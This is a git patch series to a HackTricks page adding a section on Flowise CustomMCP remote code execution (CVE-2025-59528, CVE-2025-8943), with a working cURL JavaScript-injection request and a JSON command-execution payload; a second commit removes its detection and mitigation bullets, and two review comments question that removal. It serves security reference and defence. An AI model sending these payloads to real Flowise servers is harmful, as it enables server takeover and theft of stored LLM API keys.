From 5580bef09af042f4852f1f8059ae2623e98d9f0a Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sat, 29 Nov 2025 01:29:31 +0000 Subject: [PATCH 1/2] Add content from: Metasploit Wrap-Up 11/28/2025 --- src/AI/AI-MCP-Servers.md | 57 +++++++++++++++++++++++++++++++++++++++- 1 file changed, 56 insertions(+), 1 deletion(-) diff --git a/src/AI/AI-MCP-Servers.md b/src/AI/AI-MCP-Servers.md index baec4ba21f8..b7941b6921b 100644 --- a/src/AI/AI-MCP-Servers.md +++ b/src/AI/AI-MCP-Servers.md 
@@ -159,8 +159,63 @@ See also – operational abuse and detection of local AI CLI/MCP clients: ../generic-methodologies-and-resources/phishing-methodology/ai-agent-abuse-local-ai-cli-tools-and-mcp.md {{#endref}} +### Flowise MCP Workflow RCE (CVE-2025-59528 & CVE-2025-8943) + +Flowise embeds MCP tooling inside its low-code LLM orchestrator, but its **CustomMCP** node trusts user-supplied JavaScript/command definitions that are later executed on the Flowise server. Two separate code paths trigger remote command execution: + +- `mcpServerConfig` strings are parsed by `convertToValidJSONString()` using `Function('return ' + input)()` with no sandboxing, so any `process.mainModule.require('child_process')` payload executes immediately (CVE-2025-59528 / GHSA-3gcm-f6qx-ff7p). The vulnerable parser is reachable via the unauthenticated (in default installs) endpoint `/api/v1/node-load-method/customMCP`. +- Even when JSON is supplied instead of a string, Flowise simply forwards the attacker-controlled `command`/`args` into the helper that launches local MCP binaries. Without RBAC or default credentials, the server happily runs arbitrary binaries (CVE-2025-8943 / GHSA-2vv2-3x8x-4gv7). + +Metasploit now ships two HTTP exploit modules (`multi/http/flowise_custommcp_rce` and `multi/http/flowise_js_rce`) that automate both paths, optionally authenticating with Flowise API credentials before staging payloads for LLM infrastructure takeover. + +Typical exploitation is a single HTTP request. 
The JavaScript injection vector can be demonstrated with the same cURL payload Rapid7 weaponised: + +```bash +curl -X POST http://flowise.local:3000/api/v1/node-load-method/customMCP \ + -H "Content-Type: application/json" \ + -H "Authorization: Bearer " \ + -d '{ + "loadMethod": "listActions", + "inputs": { + "mcpServerConfig": "({trigger:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"sh -c \\\"id>/tmp/pwn\\\"\");return 1;})()})" + } + }' +``` + +Because the payload is executed inside Node.js, functions such as `process.env`, `require('fs')`, or `globalThis.fetch` are instantly available, so it is trivial to dump stored LLM API keys or pivot deeper into the internal network. + +The command-template variant exercised by JFrog (CVE-2025-8943) does not even need to abuse JavaScript. Any unauthenticated user can force Flowise to spawn an OS command: + +```json +{ + "inputs": { + "mcpServerConfig": { + "command": "touch", + "args": ["/tmp/yofitofi"] + } + }, + "loadMethod": "listActions" +} +``` + +#### Detection ideas + +- Web server or Flowise logs containing requests to `/api/v1/node-load-method/customMCP` with unexpected `loadMethod` values, or payloads that reference `process.mainModule`, `child_process`, `fs`, etc. +- Process creation telemetry from the Flowise host for binaries launched under the Flowise service account (e.g., sudden `bash`, `powershell`, `curl`, `nc`, `python`). +- File integrity monitoring around `/tmp`, project directories, or `/home/flowise/.flowise` for artefacts created immediately after Flowise receives `customMCP` requests. + +#### Mitigations + +- Upgrade to **Flowise 3.0.6+** where `convertToValidJSONString` and the custom MCP loader were hardened; earlier versions (≤3.0.5) are trivially exploitable. +- Set `FLOWISE_USERNAME`/`FLOWISE_PASSWORD`, disable anonymous API access, and restrict `/api/v1/node-load-method/*` to trusted admin subnets via reverse proxies. 
+- Remove Custom MCP capability if not strictly required (`DISABLE_FLOWISE_CUSTOM_MCP=1`) or wrap it with an allow-list proxy so only vetted executables can be launched. +- Monitor and rotate any secrets stored inside Flowise (LLM provider API keys, database passwords) after an incident because the RCE primitives grant full filesystem and network access. + ## References - [CVE-2025-54136 – MCPoison Cursor IDE persistent RCE](https://research.checkpoint.com/2025/cursor-vulnerability-mcpoison/) +- [Metasploit Wrap-Up 11/28/2025 – new Flowise custom MCP & JS injection exploits](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-11-28-2025) +- [GHSA-3gcm-f6qx-ff7p / CVE-2025-59528 – Flowise CustomMCP JavaScript code injection](https://github.com/advisories/GHSA-3gcm-f6qx-ff7p) +- [GHSA-2vv2-3x8x-4gv7 / CVE-2025-8943 – Flowise custom MCP command execution](https://github.com/advisories/GHSA-2vv2-3x8x-4gv7) +- [JFrog – Flowise OS command remote code execution (JFSA-2025-001380578)](https://research.jfrog.com/vulnerabilities/flowise-os-command-remote-code-execution-jfsa-2025-001380578) {{#include ../banners/hacktricks-training.md}} - From 66420032b847769baeee30e12bb51037a5347438 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Sun, 30 Nov 2025 17:58:46 +0100 Subject: [PATCH 2/2] Update AI-MCP-Servers.md --- src/AI/AI-MCP-Servers.md | 13 ------------- 1 file changed, 13 deletions(-) diff --git a/src/AI/AI-MCP-Servers.md b/src/AI/AI-MCP-Servers.md index b7941b6921b..6dcd0b9eb6f 100644 --- a/src/AI/AI-MCP-Servers.md +++ b/src/AI/AI-MCP-Servers.md 
@@ -198,19 +198,6 @@ The command-template variant exercised by JFrog (CVE-2025-8943) does not even ne } ``` -#### Detection ideas - -- Web server or Flowise logs containing requests to `/api/v1/node-load-method/customMCP` with unexpected `loadMethod` values, or payloads that reference `process.mainModule`, `child_process`, `fs`, etc. -- Process creation telemetry from the Flowise host for binaries launched under the Flowise service account (e.g., sudden `bash`, `powershell`, `curl`, `nc`, `python`). -- File integrity monitoring around `/tmp`, project directories, or `/home/flowise/.flowise` for artefacts created immediately after Flowise receives `customMCP` requests. - -#### Mitigations - -- Upgrade to **Flowise 3.0.6+** where `convertToValidJSONString` and the custom MCP loader were hardened; earlier versions (≤3.0.5) are trivially exploitable. -- Set `FLOWISE_USERNAME`/`FLOWISE_PASSWORD`, disable anonymous API access, and restrict `/api/v1/node-load-method/*` to trusted admin subnets via reverse proxies. -- Remove Custom MCP capability if not strictly required (`DISABLE_FLOWISE_CUSTOM_MCP=1`) or wrap it with an allow-list proxy so only vetted executables can be launched. -- Monitor and rotate any secrets stored inside Flowise (LLM provider API keys, database passwords) after an incident because the RCE primitives grant full filesystem and network access. - ## References - [CVE-2025-54136 – MCPoison Cursor IDE persistent RCE](https://research.checkpoint.com/2025/cursor-vulnerability-mcpoison/) - [Metasploit Wrap-Up 11/28/2025 – new Flowise custom MCP & JS injection exploits](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-11-28-2025)
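Review bot: in the first hunk (the new `### Flowise MCP Workflow RCE` section, `@@ -159,8 +159,63 @@`), the cURL example sends `-H "Authorization: Bearer "` with an empty token, which contradicts the sentence two paragraphs earlier calling the endpoint unauthenticated in default installs and will be copied verbatim by readers; either drop the header or use an obvious placeholder such as `-H "Authorization: Bearer <FLOWISE_API_KEY>"` with a note that it is only needed when API auth is enabled. No source is cited for `DISABLE_FLOWISE_CUSTOM_MCP=1` in the Mitigations bullets or for the `/home/flowise/.flowise` path in Detection ideas; if they come from Flowise documentation, link it next to the bullet, otherwise drop them, since an operator who sets a no-op variable will believe the node is disabled. Minor wording: "Without RBAC or default credentials, the server happily runs arbitrary binaries" reads ambiguously (it could mean credentials are the problem); "With no RBAC and no credentials configured by default, the server runs arbitrary binaries" says what is meant.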
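Review bot: dropping both the `#### Detection ideas` and `#### Mitigations` subsections in the second hunk (`@@ -198,19 +198,6 @@`) leaves the Flowise section with exploitation requests and a reference list but no fix version, no hardening steps and no detection guidance, and the commit message ("Update AI-MCP-Servers.md") gives no reason for the removal. If the motivation is that some bullets were unverified (the `DISABLE_FLOWISE_CUSTOM_MCP=1` variable, the `/home/flowise/.flowise` path), remove only those and keep the bullets that stand on their own, at minimum the upgrade line `- Upgrade to **Flowise 3.0.6+** ...` and the log-based detection bullet for `/api/v1/node-load-method/customMCP`; otherwise state the reason in the commit message so the history explains why defensive guidance was cut one day after it was added.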